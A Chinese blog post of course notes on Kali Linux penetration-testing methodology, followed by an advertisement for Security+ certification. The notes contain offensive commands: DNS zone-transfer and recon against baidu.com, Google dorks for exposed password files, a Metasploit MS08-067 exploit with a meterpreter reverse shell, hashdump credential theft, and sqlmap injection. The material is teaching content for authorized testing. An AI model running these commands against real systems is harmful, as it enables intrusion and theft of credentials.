1. 程式人生 > >【安全牛學習筆記】Kali Linux滲透測試方法

【安全牛學習筆記】Kali Linux滲透測試方法

信息安全 kali linux security+

1.安全問題的根源

①由於分層思想,導致每個層次的相關人員都只關心自己層次的工作,因此每個人認識系統都是片面的,而安全是全方位的,整體的,所以造成安全問題。

②技術人員追求效率,導致只追求功能實現,而很容易忽略安全性的工作

③由於人都是會犯錯誤的,因此最大的安全威脅是人,所以無法避免安全隱患,但可以降低安全風險

軟件安全生命周期:

需求——>設計——>編碼——>測試——>上線——>運維

安全需求——>系統架構——>編碼規範——>代碼審計——>部署規範——>環境審計

正向思維

逆向思維:滲透測試

滲透測試的意義:

1,安全建設

①周期長

②投入大

③效果難測量

滲透測試:

①從問題出發

②黑客視角

③高效率

滲透測試的目標:達到安全。

安全建設

防護性的安全建設:防守角度,降低攻擊面,但防守不全面。

攻擊性安全:以黑客思維,攻擊手段去探測系統的漏洞,提前修補好。

基於debain的linux發行版本,前身為BackTrack

包括600多個安全工具

用於滲透測試和安全審計

FHS標準目錄結構

支持ARM的多平臺和手機平臺

開源免費

策略

root用戶策略(一些工具需要root用戶權限去使用)

網絡服務策略(默認所有網絡服務都是關閉的,所有自動啟動腳本都不會執行,但可以使用update rd -d去執行)

更新升級策略(系統由debian維護,工具由kali官網維護)

滲透測試標準PETS(

www.pentest-standard.org)

1.前期交互階段:和客戶進行溝通,確定滲透測試範圍,方式等

例如:一個應用系統(如一個電商網站),如果一個應用系統太大,則劃分為多個小系統

2.情報收集階段:郵箱地址,DNS服務器等被動信息收集,端口掃描,端口發現等主動信息收集

被動信息收集:滲透者不與目標系統,目標系統人員產生直接聯系,而是通過第三方

域名(重要)、郵箱、人員、地址

– nslookup:nslookup -type=ns baidu.com 8.8.8.8

dig:dig @8.8.8.8 baidu.com ns

查詢bind版本:dig @8.8.8.8 +noall +answer txt chaosVERSION.BIND @dns.baidu.com

域名傳輸:dig @dns.baidu.com axfr

註冊信息:whois baidu.com(可以搜索到域名服務器ns記錄,各個域名對應的IP地址,域名註冊者的信息,註冊人名字,位置,電話,郵箱等)

綜合性工具:

– Fierce:fierce -dnsserver 8.8.8.8 -dnsbaidu.com /usr/share/fierce.hosts.txt

/usr/share/fierce.hosts.txt為本地提供的字典,該命令會根據字典來進行暴力破解該域名的註冊信息

– Dnsrecon:dnsrecon -d baidu.com -t std--lifetime 10

-t std:指定搜索類型

--lifetime 10:指定超時時間

搜索引擎

– Shodan:(https://www.shodan.io):搜索在互聯網上存在的設備,通過搜索的信息,發現其中的漏洞

– Google

inurl ".php?id"

搜索機架攝像頭:intitle :"netbotz appliance""ok"

filetype:xls"username|password"

圖片可以查看出metadata,存有拍攝時的gps信息

專屬密碼字典(根據個人信息生成)

– Cupp(需要去下載,默認不在kali裏面)

主動信息收集

域名——>子域名——>IP地址——>通常把IP地址所在的C類地址段掃描一遍——>查看開放端口——>開啟的服務信息

nmap使用示例:

環境:靶機:192.168.1.116

nmap -s$ 192.168.1.116 //查看開啟的端口及對應的服務

nmap -p21 -sV 192.168.1.116 //查看端口服務版本信息(查看是否是最新版本,如果不是,是否存在漏洞)

因為如果要掃描的網段和端口比較多,最好使用簡單腳本去進行自動化掃描

比較有價值的服務端口掃描:

snmp,smb,smtp,web

識別防護機制:

LBD

Wafwoof:造成基於web滲透測試註入失敗

Fragroute

Nmap

wafwoof -l//查看wafwoof可以掃描的wafwoof設備

具體掃瞄網站:wafwoof xxxx(網址)

掃描負載均衡設備:

lbd www.baidu.com 80

fragroute:檢測目標系統是否使用了一些IPS,IDS防護設備工具

3.威脅建模階段:分析信息,確定效率最高的滲透攻擊途徑

從技術黑盒的角度進行威脅建模,結果作為滲透測試報告的一部分提交。

4.漏洞分析階段:查看服務器軟件版本等發現漏洞,編寫針對性的漏洞攻擊代碼

漏洞掃描:(只是漏洞發現,並不知道如何利用)

nessus

openvas

nexpose

nmap

script

kali裏面的已知漏洞分析:

已知漏洞利用:

sandi-gui

searchsploit //用於搜索軟件是否存在漏洞

metaspolit armitage:(metaspolit圖形化前端)

例如: searchsploit vsftp

metaspolit:(M的圖標)

msf >use exploit/windows/smb/ms08_067_netapi //利用windows xp的漏洞

msf exploit(ms08_067_netapi)>set payload windows/meterpreter/reverse_tcp //利用載荷,讓目標主機被攻擊後反向連接到攻擊者主機

msf exploit(ms08_067_netapi)>show options //查看需要設置的選項

msf exploit(ms08_067_netapi)>set rhost xxxx(目標ip地址)

msf exploit(ms08_067_netapi)>set lhost xxxx(本地ip地址)

msf exploit(ms08_067_netapi)>exploit(若目標主機存在該漏洞,就可以連上目標)

出現"meterpreter >"就是已經連接上了目標主機meterpreter >getuid 查看登陸賬號信息 meterpreter >ps 查看進程

meterpreter >sysinfo 查看系統信息

meterpreter >getpid 查看註入的是利用哪個id

meterpreter >getsystem 提升權限

meterpreter >hashdump 查看本地賬戶和哈希密碼

新建文件把hashdump的內容保存下來,準備做密碼破解

meterpreter >screenshot 截屏目標主機桌面

meterpreter >run vnc 查看當前主機活動桌面(實時交互)

web掃描: nikto burpsuite owasp zap sqlmap:針對sql註入漏洞的

bursuite:代理截斷式工具

①在瀏覽器更改代理,改為使用bursuite代理

②等待bursuite截斷到客戶端在瀏覽器對服務器的請求,然後保存截斷信息到本地文件中

③使用sqlmap查看是否存在sql註入漏洞sqlmap -r burp(文件名) --dbs

5.滲透攻擊階段:往往會碰到一些防護手段,再重新執行2-4步驟,進行滲透測試

6.後滲透測試階段:進一步滲透攻擊,獲得更多信息

7.滲透測試報告:如何發現漏洞,漏洞利用,漏洞修復等

項目

滲透測試範圍

獲得授權

滲透測試方法

是否允許社會工程學

是否允許拒絕服務攻擊

掃描器無法排除業務邏輯層面的漏洞,比如用戶權限的逾越

該筆記為安全牛課堂學員筆記,想看此課程或者信息安全類幹貨可以移步到安全牛課堂


Security+認證為什麽是互聯網+時代最火爆的認證?

牛妹先給大家介紹一下Security+


Security+ 認證是一種中立第三方認證,其發證機構為美國計算機行業協會CompTIA ;是和CISSP、ITIL 等共同包含在內的國際 IT 業 10 大熱門認證之一,和CISSP偏重信息安全管理相比,Security+ 認證更偏重信息安全技術和操作。

通過該認證證明了您具備網絡安全,合規性和操作安全,威脅和漏洞,應用程序、數據和主機安全,訪問控制和身份管理以及加密技術等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業和安全專業人士所普遍采納。

Security+認證如此火爆的原因?

原因一:在所有信息安全認證當中,偏重信息安全技術的認證是空白的, Security+認證正好可以彌補信息安全技術領域的空白 。

目前行業內受認可的信息安全認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重信息安全管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的信息安全工作經驗都要5年以上,CISP也要求大專學歷4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中,無論是找工作還是升職加薪,或是投標時候報人員,認證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙,由於Security+偏重信息安全技術,所以對工作經驗沒有特別的要求。只要你有IT相關背景,追求進步就可以學習和考試。

原因二: IT運維人員工作與翻身的利器。

在銀行、證券、保險、信息通訊等行業,IT運維人員非常多,IT運維涉及的工作面也非常廣。是一個集網絡、系統、安全、應用架構、存儲為一體的綜合性技術崗。雖然沒有程序猿們“生當做光棍,死亦寫代碼”的悲壯,但也有著“鋤禾日當午,不如運維苦“的感慨。天天對著電腦和機器,時間長了難免有對於職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網絡安全知識,掌握網絡安全實踐。職業發展朝著網絡安全的方向發展,解決國內信息安全人才的匱乏問題。另外,即使不轉型,要做好運維工作,學習安全知識取得安全認證也是必不可少的。

原因三:接地氣、國際範兒、考試方便、費用適中!

CompTIA作為全球ICT領域最具影響力的全球領先機構,在信息安全人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。適合銀行、證券、保險、互聯網公司等IT相關人員學習。作為國際認證在全球147個國家受到廣泛的認可。

在目前的信息安全大潮之下,人才是信息安全發展的關鍵。而目前國內的信息安全人才是非常匱乏的,相信Security+認證一定會成為最火爆的信息安全認證

本文出自 “11662938” 博客,請務必保留此出處http://11672938.blog.51cto.com/11662938/1980330

【安全牛學習筆記】Kali Linux滲透測試方法